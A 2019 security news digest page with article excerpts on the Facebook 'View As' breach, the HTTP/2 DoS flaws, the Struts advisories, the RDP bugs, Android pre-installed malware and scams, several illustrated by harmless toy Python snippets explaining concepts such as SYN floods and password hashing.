Repairs & Upgrades

August 19, 2019 »

Did Facebook know about “View As” bug before 2018 breach?

By Lisa Vaas

A recent court filing indicates that Facebook knew about the bug in its View As feature that led to the 2018 data breach – a breach that would turn out to affect nearly 29 million accounts. The filing suggests that Facebook protected its own employees from the bug’s repercussions, but didn’t bother to warn its users.

There was a class action lawsuit – Carla Echavarria and Derrick Walker v. Facebook, Inc. – filed within hours of Facebook’s revelations last September that attackers had exploited a vulnerability in its “View As” feature to steal access tokens: the keys that allow you to stay logged in to Facebook so you don’t need to re-enter your password every time you use the app.

Reuters reports that the lawsuit in question actually combined several legal actions, presumably including the one filed on the same day as Facebook disclosed the breach.

The breach

As Naked Security’s Paul Ducklin explained at the time, the View As feature lets you preview your profile as other people would see it.

This is supposed to be a security feature that helps you check whether you’re oversharing information you meant to keep private. But crooks figured out how to exploit a bug (actually, a combination of three different bugs) so that when they logged in as user X and did View As user Y, they essentially became user Y. From Paul:

If user Y was logged into Facebook at the time, even if they weren’t actually active on the site, the crooks could recover the Facebook access token for user Y, potentially giving them access to lots of data about that user.

That’s exactly what attackers did: they took the profile details belonging to some 14 million users, including birth dates, employers, education history, religious preference, types of devices used, pages followed and recent searches and location check-ins.


Multiple HTTP/2 DoS flaws found by Netflix

By Danny Bradbury

Netflix has identified several denial of service (DoS) flaws in numerous implementations of HTTP/2, a popular network protocol that underpins large parts of the web. Exploiting them could make servers grind to a halt.

HTTP/2 is the latest flavour of HTTP, the application protocol that manages communication between web servers and clients. Released in 2015, HTTP/2 introduced several improvements intended to make sessions faster and more reliable.

Updates included:

  • HTTP header compression. In previous HTTP versions, only the body of a message could be compressed, even though for small web pages the headers, which often include data such as cookies and are always sent in text format, could be bigger than the body.
  • Multiplexed streams and binary packets. This made it easier to download multiple items in parallel, speeding up rendering of web pages made up of many parts.
  • Server Push. This means the server can send across cacheable information that the client might need later, even if it hasn’t been requested yet.

Features like these can help reduce latency and improve search engine rankings. The problem is that more complexity means more opportunity for bugs.
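The header-compression idea above can be sketched in a few lines. This is not real HPACK (HTTP/2’s actual compression scheme is considerably more involved), just a toy illustration of why repeated requests get cheaper once headers can be referenced by index; the byte estimates are invented for illustration:

```python
# Toy sketch of the idea behind HTTP/2 header compression: headers seen
# before are replaced by a small integer index instead of being re-sent
# as full "Name: value" text. NOT real HPACK -- just the core intuition.

def encode(headers, table):
    """Encode a header list, reusing indices for headers already in `table`."""
    out = []
    for name, value in headers:
        key = (name, value)
        if key in table:
            out.append(("idx", table[key]))       # one small index token
        else:
            table[key] = len(table) + 1           # add to the dynamic table
            out.append(("lit", name, value))      # full literal header
    return out

def wire_size(encoded):
    """Very rough byte estimate: 2 bytes per index, full text for literals."""
    size = 0
    for tok in encoded:
        if tok[0] == "idx":
            size += 2
        else:
            size += len(tok[1]) + len(tok[2]) + 4  # "name: value\r\n"
    return size

headers = [
    ("cookie", "session=abc123..."),
    ("user-agent", "ExampleBrowser/1.0"),
    ("accept", "text/html"),
]

table = {}
first = wire_size(encode(headers, table))    # first request: all literals
second = wire_size(encode(headers, table))   # repeat request: all indices
print(first, second)                         # the repeat costs a fraction
```

The same dynamic-table idea is also part of the attack surface: several of the Netflix-reported flaws abuse exactly this kind of per-connection server-side state.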

Netflix explains this in its writeup of the issue:

The algorithms and mechanisms for detecting and mitigating “abnormal” behavior are significantly more vague and left as an exercise for the implementer. From a review of various software packages, it appears that this has led to a variety of implementations with a variety of good ideas, but also some weaknesses.

There are eight of those weaknesses, all with their own separate CVE number and nickname.

Some flaws are reminiscent of other non-HTTP/2 DoS attacks.


61 impacted versions of Apache Struts left off security advisories

By Lisa Vaas

Security researchers have reviewed security advisories for Apache Struts and found that two dozen of them inaccurately listed affected versions for the open-source development framework.

The advisories have since been updated to reflect an additional 61 unique versions of Struts that were affected by at least one previously disclosed vulnerability but had been left off the security advisories for those vulnerabilities.

The extensive analysis was done by the Black Duck Security Research (BDSR) team of Synopsys’ Cybersecurity Research Center (CyRC), which investigated 115 distinct releases for Apache Struts and correlated those releases against 57 existing Apache Struts Security Advisories covering 64 vulnerabilities.
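The kind of correlation the BDSR team performed can be sketched as a simple range check: take every released version, compare it against each advisory’s affected range, and flag releases that fall inside a vulnerable range but are missing from the advisory’s own list. The versions, ranges, and advisory structure below are all invented for illustration, not BDSR’s actual data or method:

```python
# Hypothetical sketch of advisory/release correlation: flag releases
# that fall inside a vulnerability's affected range but are absent from
# the advisory's stated list. All version data here is made up.

def parse(v):
    """'2.3.6' -> (2, 3, 6), so versions compare numerically."""
    return tuple(int(x) for x in v.split("."))

def in_range(version, lo, hi):
    return parse(lo) <= parse(version) <= parse(hi)

releases = ["2.3.5", "2.3.6", "2.3.7", "2.5.0", "2.5.1"]

advisory = {
    "affected_range": ("2.3.5", "2.5.1"),    # what the vulnerability hits
    "listed": {"2.3.5", "2.5.0", "2.5.1"},   # what the advisory names
}

lo, hi = advisory["affected_range"]
missed = [v for v in releases
          if in_range(v, lo, hi) and v not in advisory["listed"]]
print(missed)   # ['2.3.6', '2.3.7'] -- vulnerable but absent from the advisory
```

Anyone pinning one of the “missed” versions would see no advisory mention it and wrongly conclude they were safe.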

Synopsys’ Tim Mackey said in a blog post on Thursday that the danger isn’t that developers and users may have upgraded needlessly. Rather, the real danger is that needed updates may not have happened:

While our findings included the identification of versions that were falsely reported as impacted in the original disclosure, the real risk for consumers of a component is when a vulnerable version is missed in the original assessment. Given that development teams often cache ‘known good’ versions of components in an effort to ensure error-free compilation, under-reporting of impacted versions can have a lasting impact on overall product security.

Case in point: Equifax

Promptly patching security vulnerabilities in Apache Struts is a vital task: you can ask Equifax all about possible ramifications of failing to do so. Equifax blamed a nasty server-side remote code execution (RCE) bug (CVE-2017-5638) for the massive data breach of 2017. The patch had been available for months before the breach, it turned out, but Equifax hadn’t applied it.


iPhone holes and Android malware – how to keep your phone safe

By Paul Ducklin

Recent news stories about mobile phone security – or, more precisely, about mobile phone insecurity – have been more dramatic than usual.

That’s because we’re in what you might call “the month after the week before” – last week being when the annual Black Hat USA conference took place in Las Vegas.

A lot of detailed cybersecurity research gets presented for the first time at that event, so the security stories that emerge after the conference papers have been delivered often dig a lot deeper than usual.

In particular, we heard from two mobile security researchers in Google’s Project Zero team: one looked at the Google Android ecosystem; the other at Apple’s iOS operating system.

Natalie Silvanovich documented a number of zero-day security holes in iOS that crooks could, in theory, trigger remotely just by sending you a message, even if you never got around to opening it.

Maddie Stone described the lamentable state of affairs at some Android phone manufacturers who just weren’t taking security seriously.

Stone described one Android malware sample that infected 21,000,000 devices altogether…

…of which a whopping 7,000,000 were phones delivered with the malware preinstalled, inadvertently bundled in along with the many free apps that some vendors seem to think they can convince us we can’t live without.

But it’s not all doom and gloom, so don’t panic!


Google removes option to disable Nest cams’ status light

By Lisa Vaas

No more stashing your Nest security cameras in the bushes to catch burglars unaware: Google informed users on Wednesday that it’s removing the option to turn off the status light that indicates when your Nest camera is recording.

You can still dim the light that shows when Google’s Nest, Dropcam, and Nest Hello cameras are on and sending video and audio to Nest, Google said, but you can’t make it go away on new cameras. If the camera is on, it’s going to tell people that it’s on – with its green status light on Nest and Nest Hello cameras and the blue status light on Dropcam – in furtherance of Google’s newest commitment to privacy.

Google introduced its new privacy commitment at its I/O 2019 developers conference in May, in order to explain how its connected home devices and services work.

The setting that enabled users to turn off the status light is being removed on all new cameras. When the cameras’ live video is streamed from the Nest app, the status light will blink. The update will be done over-the-air for all Nest cams: Google’s update notice said that the company was rolling out the changes as of Wednesday, 14 August 2019.


Police site DDoSer/bomb hoaxer caught after jeering on social media

By Lisa Vaas

A UK man who DDoS-ed police websites was caught and imprisoned after he jeered at police about the attacks on social media.

Liam Reece Watts, 20, targeted the Greater Manchester Police (GMP) website in August 2018 and then the Cheshire Police site in March 2019, according to ITV News. Both public-facing websites were disabled for about a day, The Register reported.

According to news outlets and Watts’s Twitter posts, the distributed denial-of-service (DDoS) attacks were done in retaliation for Watts having been convicted of calling in bomb hoaxes just days after the 2017 Manchester Arena suicide attack left 22 people dead and 500 injured.

Watts, who was 19 at the time of the DDoS attacks, was caught after he taunted police through Twitter. He used the handle Synic: a possible reference to SYN flood, which is a type of DoS attack in which servers are swamped with SYN – i.e., synchronize – messages.
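The mechanics of a SYN flood can be simulated without sending a single packet. In TCP’s three-way handshake, each incoming SYN makes the server reserve a slot in its half-open connection table until the client completes the handshake with an ACK (or the entry times out); an attacker who sends SYNs and never ACKs exhausts the table. A minimal sketch of that accounting, with an invented backlog size:

```python
# Conceptual simulation of a SYN flood: each SYN reserves a slot in the
# server's half-open connection table; slots are freed only by the final
# ACK (or a timeout, omitted here). Flooding with SYNs that never ACK
# exhausts the table so legitimate clients get refused. No real packets.

class Server:
    def __init__(self, backlog):
        self.backlog = backlog        # max half-open connections allowed
        self.half_open = set()

    def on_syn(self, client_id):
        if len(self.half_open) >= self.backlog:
            return False              # table full: connection refused
        self.half_open.add(client_id) # SYN-ACK sent, now waiting for ACK
        return True

    def on_ack(self, client_id):
        self.half_open.discard(client_id)  # handshake done, slot freed

server = Server(backlog=128)

# Attacker sends SYNs from spoofed sources and never completes them.
for i in range(200):
    server.on_syn(f"spoofed-{i}")

print(server.on_syn("legit-user"))    # False: the backlog is exhausted
```

Real mitigations such as SYN cookies work by avoiding that per-SYN state reservation entirely.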

Watts reportedly wrote this in one of his tweets:

@Cheshirepolice want to send me to prison for a bomb hoax I never did, here you f****** go, here is what I’m guilty of.

Watts reportedly posted that tweet while police were still investigating the first DDoS attack on the GMP site in 2018, and before he unleashed the March 2019 attack on the Cheshire Police site.

He reportedly admitted to carrying out the attack after police searched his home.


August 15, 2019 »

Patch time! Microsoft warns of new worm-ready RDP bugs

By Danny Bradbury

Microsoft’s Patch Tuesday brought some very bad news yesterday: more wormable RDP vulnerabilities, this time affecting Windows 10 users.

CVE-2019-1181 and -1182 are critical vulnerabilities in Remote Desktop Services (formerly known as Terminal Services) that are wormable – similar to the BlueKeep vulnerability that people have already created exploits for. Wormable means that an exploit could, in theory, be used not only to break into one computer but also to spread itself onwards from there.

These new vulnerabilities, which Microsoft found while it was hardening RDS, can be exploited without user interaction by sending a specially-crafted remote desktop protocol (RDP) message to RDS. Once in, an attacker could install programs, change or delete data, create new accounts with full user rights, and more. CVE-2019-1222 and -1226 also address these flaws.

Unlike BlueKeep, these new RDP vulnerabilities affect Windows 10, including server versions, as well as Windows 7 SP1, Windows Server 2008 R2 SP1, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.

Microsoft said that these vulnerabilities haven’t yet been exploited in the wild, but urged customers to get ahead of the game by patching quickly:

It is important that affected systems are patched as quickly as possible because of the elevated risks associated with wormable vulnerabilities like these, and downloads for these can be found in the Microsoft Security Update Guide.

Computers with network level authentication (NLA) are partly protected, because crooks would need to authenticate before making a request, meaning that an attack couldn’t spread without human interaction on NLA-enabled systems.


Facebook got humans to listen in on some Messenger voice chats

By Lisa Vaas

Facebook has been collecting some voice chats on Messenger and paying contractors to listen to and transcribe them, Bloomberg reported on Tuesday after hearing from rattled contractors who thought that lack of user notification was unethical.

This is past tense: on Tuesday, Facebook said it knocked it off “more than a week ago” following the scrutiny that Apple and Google have gotten over doing the same thing. Bloomberg quoted a statement in which Facebook confirmed that yes, it had been transcribing users’ audio, but that it’s “paused” the practice:

Much like Apple and Google, we paused human review of audio more than a week ago.

Facebook didn’t say if or when it might resume. The company did say, however, that the eavesdropping was opt-in: only users who chose the option in Messenger would have had their voice chats transcribed. The purpose was to vet the ability of Facebook’s artificial intelligence (AI) to correctly interpret the voice messages, which, Facebook says, were anonymized.

They’re all doing it – or at least, they were

Facebook is far from the only tech giant to get its human employees to listen in on voice snippets in order to fine-tune their AI and voice recognition technologies: Google, Apple, Microsoft and Amazon have all been doing it.

In April, Bloomberg reported that Amazon employs thousands of people around the world to work on improving its Alexa digital assistant, which powers its line of Echo speakers. Amazon has confirmed that it keeps these recordings indefinitely instead of deleting the data.

It’s sometimes mundane work. It’s sometimes disturbing: contractors and employees have reported hearing what they interpret as sexual assault, children screaming for help, and other recordings that users would be very unlikely to willingly share.


Hacking forum spills rival’s 321,000-member database

By John E Dunn

When users of hacking forums turn on each other, expect things to get messy quickly.

The latest site to find itself on the receiving end of this phenomenon is a hacking forum which last Friday reportedly found its database of 321,000 members and 749,161 unique email addresses leaked on rival site RaidForums.

We can say that with confidence because by Monday the compromised accounts had become another statistic on the Have I Been Pwned (HIBP) breach database – the industry’s go-to for news of such incidents.

That dated the breach to 21 July, with the stolen data also including things that anyone frequenting a forum of this type would rather not see out in the open, such as “IP addresses, passwords, private messages, usernames.”

As Ars Technica points out, this isn’t likely to be as serious a data breach as it would be for a more mainstream website.

IP addresses will likely have been anonymized using Tor, and account email addresses probably won’t identify the users behind them – this is a cagey hacking forum, after all.

As for password security, according to the site’s breach warning, it appears that months before the breach an admin had realized the danger of using weak hashing:

We have changed the hashing algorithm of passwords from myBB default (MD5) to something more advanced a few months ago, which makes it almost impossible to decrypt your passwords.
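The forum didn’t say which algorithm replaced MD5, so the sketch below uses PBKDF2 purely because it’s in Python’s standard library. It shows the two properties that separate “something more advanced” from unsalted MD5: a per-user random salt, and a deliberately slow key-derivation function:

```python
# Sketch of salted, slow password hashing versus plain MD5. PBKDF2 is
# used only because it's in the stdlib; the forum didn't say what it
# actually adopted. (Hashes are verified by recomputing, not decrypted.)

import hashlib, hmac, os

def md5_hash(password):
    # Unsalted MD5: identical for every user with the same password,
    # fast, and covered by precomputed tables -- leaked hashes fall quickly.
    return hashlib.md5(password.encode()).hexdigest()

def pbkdf2_hash(password, salt=None, iterations=200_000):
    # A per-user random salt defeats precomputed tables; a high
    # iteration count makes every single guess expensive for an attacker.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest

def pbkdf2_verify(password, salt, iterations, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)   # constant-time compare

print(md5_hash("hunter2"))                   # always the same output
print(pbkdf2_hash("hunter2")[2].hex()[:16])  # fresh salt, new digest each time
```

Strictly speaking the admin’s phrase “decrypt your passwords” is a misnomer: password hashes aren’t decrypted, they’re guessed, and the slow hash is what makes guessing impractical.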


‘NULL’ license plate gets security researcher $12K in tickets

By Lisa Vaas

A vanity plate reading “NULL” sounded good to security researcher/hacker “Droogie,” at least in theory: maybe it would make his plate invisible to Automatic License Plate Reader (ALPR) systems?!

Maybe entering the characters – NULL is the marker used in Structured Query Language (SQL) databases to indicate that a data value doesn’t exist – would just return error messages when his plate was spotted during one of his traffic violations…?

That’s not what happened, he told an audience at the recent Defcon security conference. Instead, $12,000 in traffic violation fines happened.

Forbes quoted Droogie as he reminisced about his initial expectations:

[I thought,] ‘I’m gonna be invisible’. Instead, I got all the tickets.

As the Guardian reports, every single speeding ticket earned by cars that lacked valid license plates wound up getting assigned to Droogie’s car – turning it into a veritable NULL bucket.
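One plausible way such a mix-up happens can be shown with a toy database. If any system in the ticketing pipeline ever serializes a missing plate as the literal text “NULL” instead of a true SQL NULL, then lookups for the plate “NULL” start matching every plateless citation. The schema and records below are entirely hypothetical – we don’t know how the DMV’s systems actually work:

```python
# Hypothetical SQLite illustration of how a plate reading "NULL" can
# collide with missing data: a sloppy import stores a missing plate as
# the string "NULL", which then matches the real "NULL" vanity plate.

import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE citations (id INTEGER, plate TEXT)")
db.execute("INSERT INTO citations VALUES (1, 'NULL')")   # Droogie's plate
db.execute("INSERT INTO citations VALUES (2, 'NULL')")   # missing plate stored as text
db.execute("INSERT INTO citations VALUES (3, NULL)")     # proper SQL NULL

# A true SQL NULL never equals anything, so it doesn't match the string:
rows = db.execute("SELECT id FROM citations WHERE plate = 'NULL'").fetchall()
print(rows)   # [(1,), (2,)] -- citation 2 wrongly lands on the "NULL" plate

# Genuinely missing values must be matched with IS NULL instead:
print(db.execute("SELECT id FROM citations WHERE plate IS NULL").fetchall())  # [(3,)]
```

Citation 3 shows the system behaving correctly; citation 2 is the bug, and it’s exactly the kind that buries a “NULL” plate owner in other people’s tickets.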

I’m not paying those, Droogie told Defconners. An unsympathetic Los Angeles police department had initially told him that the only solution was to change his license plate.

But why should he? He didn’t do anything wrong. He had checked with California’s Division of Motor Vehicles (DMV), found that the “NULL” vanity plate was surprisingly available, and registered it without any problem – “no bugs or anything.”


August 14, 2019 »

Fortnite World Cup champion and family swatted while live streaming

By Lisa Vaas

16-year-old Fortnite player Kyle “Bugha” Giersdorf, who recently won $3 million in the inaugural World Cup Solo finals, was swatted Sunday night while live streaming his game play, Kotaku reports.

He was live streaming on Twitch.TV, which means that the video recording captured the arrival of the police. Yet again – this isn’t the first time live streamers have had their game play interrupted by police banging at the door – the recording was interrupted by Giersdorf’s father telling him that there were armed police at the door.

“Did he just leave?” one of the players asked, incredulous, as the sound of the game’s gunfire continued and Bugha’s character slumped to the ground.

Yes, he did leave, because there were guns IRL.

After about 10 minutes, Bugha returned, telling his buddies that he’d been swatted. “That was definitely a new one,” he said.

They come in with guns, bro. They literally pulled up, holy sh*t.

He was lucky, Bugha said: it all ended quickly and peacefully, likely due at least in part to the fact that one of the officers was a neighbor:

I was lucky because the one officer, yeah, he lives in our neighborhood.

The situation was far more harrowing for Joshua Peters, a gamer who got swatted while live streaming RuneScape in 2015. His Twitch.TV video showed him just moments after armed police stormed his house, pointed their guns at his 10-year-old brother who answered the door, and forced the gamer himself to lie face down on the floor in yet another swatting incident in the gamer community.


Coinbase explains background to June zero-day Firefox attack

By John E Dunn

Targeted phishing attacks, it is often said, can be difficult for even the wariest organisations to defend themselves against.

But how difficult?

This week’s detailed post-incident analysis of a recent, highly targeted attack on cryptocurrency exchange Coinbase by its chief information officer Philip Martin offers a glimpse into how good these attacks can be.

We’ll start with the punchline – Coinbase successfully resisted the attack, something we could already have guessed when the company tweeted the news in June that it had come under attack.

That snippet also mentioned that the attack deployed two Firefox zero-days, something that immediately grabbed the interest of news reporters as well as Mozilla, which issued patches for CVE-2019-11707 and CVE-2019-11708 after Coinbase reported their use by cybercriminals.

Fending off an attack using a combination of two zero-days is already unusually challenging but, according to Martin, the sophistication of the attack didn’t stop there.

It seems the campaign began on 30 May when around a dozen Coinbase employees received an email from someone claiming to be Gregory Harris, a Research Grants Administrator at the University of Cambridge.

This email came from the legitimate Cambridge domain, contained no malicious elements, passed spam detection, and referenced the backgrounds of the recipients.

The approach was so convincing that even as more emails were received over a two-week period, “nothing seemed amiss.”


Fake news doesn’t (always) fool mice

By Lisa Vaas

Mice can’t vote.

They can neither fill in little ovals on ballots nor move voting machine toggles with their itty bitty paws. That’s unfortunate, because the teeny rodents are less inclined than humans to be swayed by the semantics of fake news content in the form of doctored video and audio, according to researchers.

Still, the ability of mice to recognize real vs. fake phonetic construction can come in handy for sniffing out deep fakes. According to researchers at the University of Oregon’s Institute of Neuroscience, who presented their findings during a presentation at the Black Hat security conference last Wednesday (7 August), recent work has shown that “the auditory system of mice resembles closely that of humans in the ability to recognize many complex sound groups.”

Mice do not understand the words, but respond to the stimulus of sounds and can be trained to recognize real vs. fake phonetic construction. We theorize that this may be advantageous in detecting the subtle signals of improper audio manipulation, without being swayed by the semantic content of the speech.

No roomfuls of adorable mice watching YouTube

Jonathan Saunders, one of the project’s researchers, told the BBC that – unfortunately for those who find the notion irresistibly cute – the end goal of the research is not to have battalions of trained mice vetting our news:

While I think the idea of a room full of mice in real time detecting fake audio on YouTube is really adorable, I don’t think that is practical for obvious reasons.

Rather, the goal is to learn from how the mice do it and then to use the insights in order to augment existing automated fakery detection technologies.


Hacked devices can be turned into acoustic weapons

By Lisa Vaas

It’s bad enough that our devices can listen to us, whether it’s to use ultrasound to track us (even if we’re on an anonymous network) or whether it’s voice assistants picking up on our private conversations (including with human contractors listening in).

Now, PricewaterhouseCoopers (PwC) security researcher Matt Wixey brings us news of attacks that can make our devices’ embedded speakers scream at us, be it at inaudible, high-intensity frequencies or audible sounds at hearing-damaging volumes.

On Sunday at the Defcon security conference, he presented a talk on what he calls acoustic cyber-weapons.

Wixey, head of research at PwC’s cyber security practice, said that his experiments were done as part of his PhD research at University College London, where he delves into what he calls “unconventional” uses of sound as applied to security – including digital/physical crossover attacks that use malware to create physical and/or acoustic harm.


If you aren’t already aware of how much damage loud sounds can cause, take a look at Wixey’s slideshow for the Defcon talk, in which he annotated a decibel chart from Survival Life to show what level of sound will cause…

  1. Your eyes to twitch – 100 dB, or somewhere between a chainsaw and a lawnmower.
  2. Your lungs to collapse/death imminent – 188 dB.
  3. Your bones to shatter and your internal organs to rupture – 194 dB.
  4. Instant death – 200 dB, or the sound of Windows XP starting up*.

(*I’m fairly sure the Windows XP reference is just a joke. But if you want to see what level of noise will cause your eardrums to rupture, check out this training manual from Purdue University.)
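The decibel figures above are easy to misread because the scale is logarithmic: every additional 20 dB multiplies sound pressure by 10. A quick conversion shows just how extreme the jump from a 100 dB lawnmower to the 194 dB “organs rupture” level really is:

```python
# Decibels are logarithmic: +20 dB means 10x the sound pressure.
# Converting the chart's numbers into pressure ratios shows the scale.

def pressure_ratio(db_difference):
    """Ratio of sound pressures for a given difference in decibels."""
    return 10 ** (db_difference / 20)

print(round(pressure_ratio(194 - 100)))   # roughly 50,000x the 100 dB level
print(round(pressure_ratio(20)))          # +20 dB is exactly 10x
```

In other words, the gap between “eyes twitch” and “bones shatter” isn’t roughly double, it’s tens of thousands of times the pressure.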

Wixey talked about how inflicting “aural barrages” can cause both psychological and physiological effects, including neurasthenia, cardiac neurosis, hypotension, bradycardia, nausea, fatigue, headaches, tinnitus, ear pain and more.


Chrome Incognito mode detection fix busted by researchers

By Danny Bradbury

Remember that Chrome update that stopped websites from detecting Incognito mode? Well, researchers claim to have found a way around it.

Chrome’s Incognito mode is supposed to let people use computers for browsing sessions without affecting that computer’s history or polluting the browser with session cookies. That means you can search for something on a computer without it showing up there, which is useful for everyone from victims of domestic abuse through to people searching for gifts.

People also discovered another use for incognito mode, though: getting past paywall sites. Incognito mode’s cookie blocking enabled people to start a fresh session with each visit. Visitors to metered paywall sites that provide a certain number of stories for free before demanding a subscription could effectively reset the meter each time they accessed the site.

Sites got wise to this and figured out a way to spot Chrome browsers in Incognito mode. In regular browsing sessions, Chrome uses the FileSystem API to read and write to the local filesystem. Google disabled that API in Incognito mode, because the whole point of those sessions is to leave no traces on disk.


August 13, 2019 »

Android users menaced by pre-installed malware

By John E Dunn

How does malware find its way on to Android smartphones and tablets?

By some margin, it’s by way of Google’s Play Store, which despite repeated efforts to clean it up remains a recurring source of dodgy apps that sit somewhere between suspiciously misleading and downright malicious.

But according to a Black Hat presentation by Google Project Zero researcher Maddie Stone, there’s another route that’s nearly impossible for users to defend themselves against – malicious apps that have been factory pre-installed.

It starts with the sheer number of apps that now come with Android devices out of the box – somewhere between 100 and 400.

Criminals only need to subvert one of those, which has become a particular problem for cheaper smartphones using the Android Open Source Platform (AOSP) as opposed to the licensed ‘stock’ Google version that powers better-known brands.

Chamois botnet

She cited several instances encountered while doing her old job on Google’s Android Security team, including an SMS and click fraud botnet called Chamois which managed to infect at least 21 million devices from 2016 onwards.

The malware behind it proved harder to defeat than anticipated, in part because the company realized in March 2018 that in the case of 7.4 million devices the infection had been pre-installed in the supply chain.


Don’t let the crooks ‘borrow’ your home router as a hacking server

By Paul Ducklin

We’ve written about the trials and tribulations of SSH before.

SSH, short for Secure Shell, is probably the most common toolkit for remotely managing computers.

Windows users may be more familiar with RDP, or Remote Desktop Protocol, which gives you full graphical remote control of a Windows computer, with access to the regular Windows desktop via mouse and keyboard.

But almost every Linux or Unix sysadmin out there, plus many Windows sysadmins, use SSH as well as or instead of RDP, because of its raw power.

SSH is more generic than RDP, allowing you to run pretty much any program remotely, so you can administer the computer automatically from afar via pre-written scripts, or open up a terminal window and control the remote system interactively by typing in commands live – or do both at the same time.

As a result, crooks who can figure out your SSH password have their own way into your computer, if not your whole network.

SSH also provides you with a feature called network tunneling, whereby you use SSH to create an encrypted network connection or “tunnel” from computer A to B, and then create an onward connection from B to C to do the actual online work you want.

For security-conscious users, that’s good – it makes it easy to “skip over” untrusted parts of the network, such as your coffee shop Wi-Fi router.
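The forwarding idea at the heart of a tunnel can be sketched in plain TCP. Real SSH tunnels (e.g. `ssh -L`) carry the A-to-B leg over an encrypted channel; this stripped-down sketch only shows the relay on host B that accepts a connection and shuttles the bytes on to C. Hosts and ports here are local stand-ins:

```python
# The relay at the heart of a tunnel, minus SSH's encryption: a
# forwarder ("B") accepts a connection from "A" and shuttles the bytes
# on to the real destination "C". Single-connection toy, loopback only.

import socket, threading

def run_forwarder(listen_port, target_host, target_port):
    """Accept one connection and relay it to the target (the B -> C leg)."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(1)

    def relay():
        client, _ = srv.accept()                         # connection from A
        upstream = socket.create_connection((target_host, target_port))
        upstream.sendall(client.recv(4096))              # forward A's request
        client.sendall(upstream.recv(4096))              # relay C's reply back
        client.close(); upstream.close(); srv.close()

    threading.Thread(target=relay, daemon=True).start()

def run_echo_server(port):
    """Stand-in for the final destination C: echoes what it receives."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.sendall(b"echo: " + conn.recv(4096))
        conn.close(); srv.close()

    threading.Thread(target=serve, daemon=True).start()

run_echo_server(9102)                      # "C" (ports are arbitrary)
run_forwarder(9101, "127.0.0.1", 9102)     # "B", the tunnel endpoint

with socket.create_connection(("127.0.0.1", 9101)) as a:   # "A"
    a.sendall(b"hello")
    print(a.recv(4096))                    # b'echo: hello', via the relay
```

As far as C is concerned, the traffic came from B – which is exactly why crooks find a “borrowed” home router so useful as a relay.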


Scammers recruiting money mules on dating sites on the rise, says FBI

By Lisa Vaas

There are a lot of boxes to tick off to let a dating site know who you want to get cozy with.

Gay? Hetero? Tall? Short? Left-wing, right-wing, dairy-intolerant, beard-abhorring?

And now, a rising trend: there are more and more suitors looking to tick off a box that would read “mule” if it were that easy to find lovelorn patsies to launder money or run drugs for them. And by “suitors,” I mean romance-scamming crooks, of course.

The FBI’s online crime division – the Internet Crime Complaint Center (IC3) – on Monday issued a warning about the rising number of faux lover-boys and -girls who are turning to online dating sites to run what are known as romance or confidence frauds.

We’ve seen plenty of these scams in past years: FBI numbers show that in 2017, more than 15,000 people filed complaints with the IC3, alleging that they were victims of romance/confidence frauds and reporting losses of more than $211 million. The following year – 2018 – reported losses skyrocketed by more than 70%: the number of victims filing complaints increased to more than 18,000, and they reported more than $362 million in losses.

Based on the number of victims, this type of fraud was the seventh most commonly reported scam last year. Money-wise, it was the second costliest scam in terms of losses reported by those victims. It’s ensnaring every type of victim, regardless of age, education or income bracket, the FBI says, though the most targeted demographics are the elderly, women, and widows or widowers.

Modus operandi

This is how these swindles go: First, the conman or woman gets their victim’s trust. Then, they try to convince them to send money, whether it’s for an airfare to visit, to ostensibly bail them out when they claim to have gotten arrested en route, to prove they can be trusted, to buy a home for the heartthrob they’ve never met, or for any other of an endless litany of sob stories.


Don’t fall for fake Equifax settlement sites, warns FTC

By Lisa Vaas

Two years ago, we asked this question: Will the Equifax pain ever end?

We can now say that the answer is “Nope, probably not”.

The Federal Trade Commission (FTC) last week said that just one week after it put up a site for people to check whether their data was exposed in the 2017 mega-breach, e-scum have put up bogus Equifax settlement claim sites.

At the legitimate FTC site, people can file a claim for benefits available under the settlement that the FTC and others reached with Equifax. An estimated 147 million potential claimants may be eligible for up to $425 million in compensation from the settlement.

The FTC says that in order to make sure you’re not handing over your personal data to crooks, start your claim at the official website:

Important notes from the FTC: You never have to pay to file a claim to get benefits from the settlement, so if somebody calls and tries to talk you into paying a fee to file a claim, they’re a scammer for sure.

Once you’re on the official settlement website, you can determine if you’re an eligible claimant. You might shudder at having to hand over personal details, but you will have to enter your last name and the last six digits of your Social Security number (SSN). If the site tells you your personal information was affected by the data theft, you can go ahead and file a claim.
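One crude way to eyeball a suspicious link is to measure how close a domain is to the one you expect: lookalike domains tend to score suspiciously high while still not matching exactly. The domains below are invented examples, not real settlement sites, and this is a rough heuristic, not a substitute for the FTC’s actual advice of starting from the official site:

```python
# Rough lookalike-domain check using stdlib string similarity. The
# "official" domain and all candidates here are invented examples.

from difflib import SequenceMatcher

def similarity(a, b):
    """0.0..1.0 similarity between two strings."""
    return SequenceMatcher(None, a, b).ratio()

official = "example-settlement.com"          # hypothetical official domain

candidates = [
    "example-settlement.com",                # exact match: fine
    "examp1e-settlement.com",                # '1' for 'l': classic typosquat
    "example-settlements.net",               # plural + different TLD
    "totally-unrelated.org",                 # no resemblance
]

for domain in candidates:
    score = similarity(domain, official)
    if domain == official:
        verdict = "exact"
    elif score > 0.8:
        verdict = "lookalike?"               # near-match: treat as suspect
    else:
        verdict = "unrelated"
    print(f"{domain:26} {score:.2f} {verdict}")
```

The 0.8 threshold is arbitrary; the point is that a domain which is almost but not quite the official one deserves the most suspicion of all.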


Banking PINs exposed in Monzo secure storage slip-up

By Danny Bradbury

When is a secure PIN not a secure PIN? When you accidentally store it in your log files.

That’s what happened to digital native bank, Monzo, which was left groveling to customers over the weekend after its security blunder.

Monzo is one of the new breed of ‘challenger banks’ that uses financial technology (fintech) systems to disrupt older, more established banks. One way of doing that is to abandon boring old brick-and-mortar branches in favour of shiny new smartphone apps. This lets them provide online-only services that can adapt quickly to meet customer demands.

